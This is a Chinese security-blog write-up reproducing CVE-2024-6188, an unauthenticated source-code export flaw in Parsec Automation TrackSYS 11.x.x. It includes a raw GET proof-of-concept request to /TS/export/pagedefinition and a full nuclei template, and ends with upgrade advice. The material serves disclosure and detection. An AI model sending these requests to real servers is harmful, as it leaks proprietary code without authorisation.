CVE-2024-6188 漏洞复现

admin 2024年7月13日13:34:15评论310 views字数 1822阅读6分4秒阅读模式

01

漏洞名称

Parsec Automation TrackSYS 敏感数据泄露漏洞

02

漏洞影响

Parsec Automation TrackSYS 11.x.x

03

漏洞描述

TrasYSYS是一个由ParsecAutomation Corp.开发的软件平台,用于管理实时操作和优化制造流程。广泛应用于各行业,用于监测、分析和提高生产过程的效率和生产率。在Parsec Automation TrackSYS 11.x.x中发现一个漏洞,攻击者不需要访问应用的任何凭据,可以直接导出页面的源代码。此问题影响文件/TS/export/pagedefinition的某些未知处理。参数ID的操作会导致直接请求。攻击可以远程启动。该漏洞已向公众公开,并可能被利用。

04

漏洞复现

POC数据包如下,传递任意真实存在的ID,即可导出源代码

GET /TS/export/pagedefinition?ID={ID} HTTP/1.1Host: {HOST}

CVE-2024-6188 漏洞复现

CVE-2024-6188 漏洞复现

漏洞复现成功

05

nuclei poc

poc文件内容如下

id: CVE-2024-6188

info:  name: TrakSYS 11.x.x - Sensitive Data Exposure  author: securityforeveryone  severity: medium  description: |    A vulnerability was found in Parsec Automation TrackSYS 11.x.x and classified as problematic. This issue affects some unknown processing of the file /TS/export/pagedefinition. The manipulation of the argument ID leads to direct request. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.  impact: An attacker is able to export the source code of the pages without having any credentials to access the application.  reference:    - https://kiwiyumi.com/post/tracksys-export-source-code/    - https://nvd.nist.gov/vuln/detail/CVE-2024-6188    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6188    - https://debricked.com/vulnerability-database/vulnerability/CVE-2024-6188  metadata:    verified: true    max-request: 1    vendor: parsec-automation    product: tracksys  tags: cve,cve2024,traksys,idor,info-leak

http:  - raw:      - |        GET /TS/export/pagedefinition?ID=1 HTTP/1.1        Host: {{Hostname}}

    matchers-condition: and    matchers:      - type: word        part: body        words:          - 'TrakSYS Version'          - 'Name'          - 'Altname'        condition: and

      - type: word        part: content_type        words:          - 'text/plain'

      - type: status        status:          - 200# digest: 4a0a00473045022100b253a5a98a7432b44402719cf5070ea48a46f736dd935a3d191850571d8ee09502204dbe17d2cfedb94c6e00365e24ceab71bea2bc0076eaafda23b18aabc7585dab:922c64590222798bb761d5b6d8e72950

06

修复建议

升级到最新版本。

~~~关注不迷路,点赞你最帅~~~

原文始发于微信公众号(AI与网安):CVE-2024-6188 漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月13日13:34:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-6188 漏洞复现https://cn-sec.com/archives/2950106.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息